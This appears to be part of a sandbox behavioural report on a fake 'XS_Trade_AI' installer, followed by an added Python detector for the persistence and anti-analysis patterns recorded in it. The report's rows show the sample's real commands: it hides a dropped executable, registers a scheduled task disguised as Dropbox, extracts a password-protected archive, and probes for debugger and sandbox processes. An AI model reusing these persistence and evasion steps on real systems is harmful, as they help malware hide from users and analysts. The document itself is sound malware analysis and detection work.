      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe Code function: 6_2_00279749 _fileno,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe Code function: 6_2_002796A5 DeviceIoControl,GetDiskFreeSpaceExW,GetDiskFreeSpaceW
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 21_2_00432088 CoCreateInstance
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp File created: C:\Users\user\AppData\Local\Programs
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe File created: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="processhacker.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="systeminformer.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="procmon.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="tcpview.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="idaq64.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="filemon.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="joeboxserver.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="cain.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="wsbroker.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="x32dbg.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="shade.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="xenservice.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="lordpe.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="proc_analyzer.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="bitbox.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="autoruns.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="regmon.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="ollydbg.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="x64dbg.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="hookexplorer.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="dumpcap.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="fiddler.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="windbg.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="procexp.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="idaq.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="httpanalyzerstdv7.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="wireshark.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="netstat.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="docker.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="httpdebuggerui.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="firejail.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="comodosandbox.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="sysanalyzer.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="cuckoo.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="immunitydebugger.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="joeboxcontrol.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="appguarddesktop.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="petools.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="autorunsc.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="sysinspector.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="netmon.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name="sniff_hit.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
      Source: XS_Trade_AI-newest_release_.exeString found in binary or memory: /LOADINF="filename"
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeFile read: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe "C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe"
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeProcess created: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp "C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp" /SL5="$402A0,1465419,721408,C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmpProcess created: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe "C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe" /verysilent /sp-
      Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exeProcess created: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp "C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp" /SL5="$20486,1465419,721408,C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe" /verysilent /sp-
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpProcess created: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe "C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe" x "C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\DontSleep_x64.zip" -o"C:\Users\user\AppData\Local\Programs\Common" -y -p55d46ea0c6e974cfc3e82261dac14874a7dd1da6cfe830e2d9f1bdd748695419
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C attrib +H +S "C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +H +S "C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\lang /tn DropboxSyncTaskMachineUA /f
      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\.cmd""
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe C:\Users\user\AppData\Local\programs\common\taskshosts.exe C:\Windows\system32\config\systemprofile\AppData\Local\programs\common\taskshosts.exe
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeProcess created: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe C:\Users\user\AppData\Local\programs\common\taskshosts.exe C:\Windows\system32\config\systemprofile\AppData\Local\programs\common\taskshosts.exe
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exe
      Source: unknownProcess created: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe C:\Users\user\AppData\Local\programs\common\taskshosts.exe
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeProcess created: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe C:\Users\user\AppData\Local\programs\common\taskshosts.exe
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exe
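The process-creation rows above record the whole drop chain: the installer stage (the is-XXXXX.tmp directories and the /SL5= argument are Inno Setup setup-loader conventions, and /LOADINF is one of its command-line switches) runs idp.exe with 7-Zip-style arguments (x, -o, -y, -p) to unpack a password-protected archive into AppData\Local\Programs\Common, hides the extracted taskshosts.exe with attrib +H +S, registers the task DropboxSyncTaskMachineUA from an XML file in Temp, and runs a .cmd from Temp; the WMI rows before that show the same installer stage looking up dozens of analysis-tool process names through Win32_Process. The Python below is an added example, not part of the Joe Sandbox report and not code from the analysed sample. It parses records of that shape and flags the four persistence/evasion patterns plus any process probing three or more known tool names. The input rows are copied from the report; the two benign control rows, the ANALYSIS_TOOLS list and the threshold of three are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample input: (source process, command line) pairs copied from the
# report's "Process created" rows, plus one benign control that must not fire.
PROCESS_EVENTS = [
    (r"C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp",
     r'"C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe" x '
     r'"C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\DontSleep_x64.zip" '
     r'-o"C:\Users\user\AppData\Local\Programs\Common" -y '
     r"-p55d46ea0c6e974cfc3e82261dac14874a7dd1da6cfe830e2d9f1bdd748695419"),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r'attrib +H +S "C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe"'),
    (r"C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp",
     r'"schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\lang '
     r"/tn DropboxSyncTaskMachineUA /f"),
    (r"C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp",
     r'"C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\.cmd""'),
    # Benign control (assumed, not from the report): querying a task is not persistence.
    (r"C:\Windows\System32\svchost.exe", r"schtasks.exe /query /tn DropboxSyncTaskMachineUA"),
]

# Constructed sample: six of the Win32_Process name probes the report lists, plus
# one ordinary inventory query (assumed) that names no analysis tool.
WMI_EVENTS = [
    (r"C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp",
     'SELECT * FROM Win32_Process WHERE Name="%s"' % tool)
    for tool in ("processhacker.exe", "procmon.exe", "x64dbg.exe",
                 "wireshark.exe", "ollydbg.exe", "fiddler.exe")
] + [(r"C:\Windows\System32\wbem\WmiPrvSE.exe", "SELECT * FROM Win32_OperatingSystem")]

# Assumed tool list, drawn from the names the sample queried; extend for your estate.
ANALYSIS_TOOLS = {
    "processhacker.exe", "systeminformer.exe", "procmon.exe", "procexp.exe", "tcpview.exe",
    "autoruns.exe", "autorunsc.exe", "x32dbg.exe", "x64dbg.exe", "ollydbg.exe", "windbg.exe",
    "immunitydebugger.exe", "idaq.exe", "idaq64.exe", "wireshark.exe", "dumpcap.exe",
    "fiddler.exe", "joeboxserver.exe", "joeboxcontrol.exe", "cuckoo.exe",
}
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
USER_PROFILE = re.compile(r"^[A-Z]:\\Users\\[^\\]+\\", re.I)
WMI_NAME_QUERY = re.compile(r'FROM\s+Win32_Process\s+WHERE\s+Name\s*=\s*"([^"]+)"', re.I)


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted paths whole, quotes dropped."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def check_process(source, cmdline):
    """Return (tag, detail) findings for one process-creation record."""
    toks = tokenize(cmdline)
    if not toks:
        return []
    low = [t.lower() for t in toks]
    image = low[0].rsplit("\\", 1)[-1]
    name = image[:-4] if image.endswith(".exe") else image
    found = []
    # 1) Task registered from an XML definition that lives in a temp directory.
    if name == "schtasks" and "/create" in low and "/xml" in low:
        i = low.index("/xml") + 1
        if i < len(toks) and TEMP_DIR.search(toks[i]):
            found.append(("scheduled task created from temp XML", toks[i]))
    # 2) attrib setting hidden/system bits on an executable under a user profile.
    if name == "attrib" and ("+h" in low or "+s" in low):
        for t in toks[1:]:
            if t.lower().endswith(".exe") and USER_PROFILE.match(t):
                found.append(("executable hidden via attrib +H/+S", t))
    # 3) 7-Zip-style extract ("x") with an inline password (-p) into a chosen directory (-o).
    if low[1:2] == ["x"] and any(t.startswith("-p") and len(t) > 2 for t in low):
        out = next((t[2:].strip('"') for t in toks if t.lower().startswith("-o")), "")
        found.append(("password-protected archive extracted", out))
    # 4) cmd /C handing control to a batch script dropped in a temp directory.
    if name == "cmd" and "/c" in low:
        rest = " ".join(t for t in toks[low.index("/c") + 1:] if t)
        if TEMP_DIR.search(rest) and re.search(r"\.(cmd|bat)\b", rest, re.I):
            found.append(("batch script executed from temp", rest))
    return found


def check_wmi(events, threshold=3):
    """Map each source to the analysis tools it looked up; keep sources at or above threshold."""
    probed = defaultdict(set)
    for source, query in events:
        m = WMI_NAME_QUERY.search(query)
        if m and m.group(1).lower() in ANALYSIS_TOOLS:
            probed[source].add(m.group(1).lower())
    return {s: sorted(n) for s, n in probed.items() if len(n) >= threshold}


def scan(process_events, wmi_events):
    """Run both checks; returns ([(source, tag, detail)], {source: [tools]})."""
    proc = [(src, tag, detail)
            for src, cmd in process_events for tag, detail in check_process(src, cmd)]
    return proc, check_wmi(wmi_events)


if __name__ == "__main__":
    proc, wmi = scan(PROCESS_EVENTS, WMI_EVENTS)
    for src, tag, detail in proc:
        print(f"[{tag}] {src} -> {detail}")
    for src, tools in wmi.items():
        print(f"[anti-analysis process enumeration] {src} probed {len(tools)} tools: {', '.join(tools)}")
```

On a live host the four process rules map directly onto Sysmon event ID 1 (process creation with command line); WMI query visibility needs WMI tracing or an EDR that instruments IWbemServices::ExecQuery. The per-source threshold matters: one process looking up procexp.exe is ordinary, one process walking through a list of debugger, sniffer and sandbox names in sequence is the signal, which is why the check groups by source rather than alerting per query.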
Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe | Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\XS_Trade_AI-newest_release_.exe | Section loaded: version.dll
